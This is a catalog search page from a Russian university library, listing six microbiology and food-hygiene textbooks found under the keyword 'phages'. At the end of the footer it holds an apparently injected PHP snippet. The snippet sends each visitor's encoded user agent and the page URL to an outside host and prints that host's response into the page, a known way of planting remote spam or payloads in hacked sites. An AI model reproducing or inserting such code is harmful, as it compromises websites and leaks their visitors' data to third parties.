Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

138 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ФАГИ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 6
1. 
Беспалова Т. А. Микробиология [Текст] : учеб. пособие для студентов специальности 260501.65 "Технология продуктов общественного питания", 260800.62 "Технология продукции и организация общественного питания" / Т. А. Беспалова, 2012. - 239 с.
Ключевые слова 
МИКРООРГАНИЗМ -- ПРОКАРИОТЫ -- БАКТЕРИИ -- ЭУКАРИОТЫ -- ВИРУС - МИКРОБИОЛОГИЯ -- ФАГИ -- МЕТАБОЛИЗМ энергетический -- ЗАБОЛЕВАНИЕ пищевое -- МИКРОБИОЛОГИЯ МОЛОКА -- МИКРОБИОЛОГИЯ кисломолочных продуктов -- МИКРОБИОЛОГИЯ сливочного масла -- Микробиология сыра -- Микробиология молочных консервов -- Микробиология мороженого -- МИКРОБИОЛОГИЯ МЯСА -- МИКРОБИОЛОГИЯ ЯИЦ -- МИКРОБИОЛОГИЯ колбас -- Микробиология мясных консервов -- Микробиология - Словарь терминов
Держатели документа (Информация об экземплярах) 
2. 
Мудрецова-Висс К. А. Основы микробиологии [Текст] / К. А. Мудрецова-Висс, В. П. Дедюхина, Е. В. Масленникова, 2015. - 383 с.
Ключевые слова 
МИКРОБИОЛОГИЯ -- БАКТЕРИИ -- ВИРУС - МИКРОБИОЛОГИЯ -- ФАГИ -- ГРИБЫ - МИКРОБИОЛОГИЯ -- ДРОЖЖИ - МИКРОБИОЛОГИЯ -- МИКРООРГАНИЗМЫ -- ПРОЦЕСС БИОХИМИЧЕСКИЙ -- ПРОЦЕСС АНАЭРОБНЫЙ -- ПРОЦЕСС АЭРОБНЫЙ -- ФАКТОР АБИОТИЧЕСКИЙ -- ФАКТОР БИОТИЧЕСКИЙ -- МИКРООРГАНИЗМ ПАТОГЕННЫЙ -- ИНФЕКЦИЯ ПИЩЕВАЯ -- ОТРАВЛЕНИЕ ПИЩЕВОЕ -- ПРОФИЛАКТИКА ПИЩЕВЫХ ЗАБОЛЕВАНИЙ -- КОНТРОЛЬ МИКРОБИОЛОГИЧЕСКИЙ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- МИКРОФЛОРА ПОЧВЫ -- МИКРОФЛОРА ВОДЫ -- МИКРОФЛОРА ВОЗДУХА -- МИКРОФЛОРА ТАРЫ -- МИКРОФЛОРА УПАКОВОЧНЫХ МАТЕРИАЛОВ -- МИКРОФЛОРА ТЕЛА ЧЕЛОВЕКА -- МИКРОБИОЛОГИЯ МОЛОКА -- МИКРОБИОЛОГИЯ МОЛОЧНЫХ ПРОДУКТОВ -- МИКРОБИОЛОГИЯ МЯСА -- МИКРОБИОЛОГИЯ КОЛБАСНЫХ ИЗДЕЛИЙ -- МИКРОБИОЛОГИЯ ЯИЦ -- МИКРОБИОЛОГИЯ ЯИЧНЫХ ПРОДУКТОВ -- МИКРОБИОЛОГИЯ РЫБЫ -- МИКРОБИОЛОГИЯ РЫБОПРОДУКТОВ -- МИКРОБИОЛОГИЯ КРУПЫ -- МИКРОБИОЛОГИЯ МУКИ -- МИКРОБИОЛОГИЯ МАКАРОННЫХ ИЗДЕЛИЙ -- МИКРОБИОЛОГИЯ ХЛЕБА -- МИКРОБИОЛОГИЯ ОВОЩЕЙ -- МИКРОБИОЛОГИЯ КОНДИТЕРСКИХ ТОВАРОВ -- МИКРОБИОЛОГИЯ ВКУСОВЫХ ТОВАРОВ -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- ПРЯНОСТИ -- СОЛЬ ПОВАРЕННАЯ -- МИКРОБИОЛОГИЯ КУЛИНАРНЫХ ИЗДЕЛИЙ -- МИКРОБИОЛОГИЯ КОНСЕРВОВ -- ГИГИЕНА ПИЩЕВЫХ ПРОДУКТОВ -- САНИТАРИЯ - ТОРГОВЛЯ
Держатели документа (Информация об экземплярах) 
3. 
Мудрецова-Висс К. А. Микробиология, санитария и гигиена [Текст] : учеб. для студ. вузов / К. А. Мудрецова-Висс, А. А. Кудряшова, В. П. Дедюхина, 2009. - 399 с.
Держатели документа (Информация об экземплярах) 
4. 
Микробиология, гигиена и санитария в торговле [Текст] : Учеб. пособие для студ. учеб. заведений сред. проф. образования и уч-ся учеб. заведений нач. проф. образования / Автор-сост. Т. П. Трушина, 2000. - 315,[1] с.
5. 
Основы микробиологии, физиологии питания и санитарии для общепита [Текст] : Учеб. пособие для студ. учеб. заведений сред. проф. образования / Авт. сост. Т. П. Трушина, 2000. - 382 с.
Ключевые слова 
БАКТЕРИЯ -- ГРИБЫ плесневые -- ДРОЖЖИ -- ВИРУС -- Фаги -- МИКРООРГАНИЗМ -- Брожение -- ФИЗИОЛОГИЯ питания -- МИКРОФЛОРА -- Пищеварение -- Белки -- Жиры -- Углеводы -- Витамины -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ -- Обмен веществ -- Режим питания -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- ПИТАНИЕ пожилых людей -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ -- ПИТАНИЕ студентов -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ГИГИЕНА общественного питания -- ПРАВИЛА САНИТАРНЫЕ в общепите -- НАДЗОР санитарно-пищевой
6. 
Санитарная микробиология и вирусология [Текст] : учеб. пособие для вузов по специальности "Ветеринария" и направлению подгот. "Ветеринарно-санитарная экспертиза" / Н. М. Колычев [и др.] ; под ред. Н. М. Колычева, 2009. - 295 с.
Держатели документа (Информация об экземплярах) 

В учебном пособии изложены задачи санитарной микробиологии в части повышения качества пищевых продуктов. Показано значение санитарной микробиологии и вирусологии в общей профилактической работе по охране здоровья населения.

Описаны микрофлора объектов внешней среды, санитарно-показательные микроорганизмы, свойства возбудителей зооантропонозов, пищевых токсикозов и токсикоинфекций. Показана роль микроорганизмов в процессе формирования и изменения качества пищевых продуктов и возникновения ряда заболеваний, вызываемых патогенными и условно патогенными видами. Рассмотрены возбудители пороков пищевых продуктов.

Даны основы промышленной гигиены и санитарии на предприятиях пищевой промышленности, санитарной вирусологии, а также организации микробиологического контроля производства.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2963 - 21.07.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.56 с.12 запросов, 0.42c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;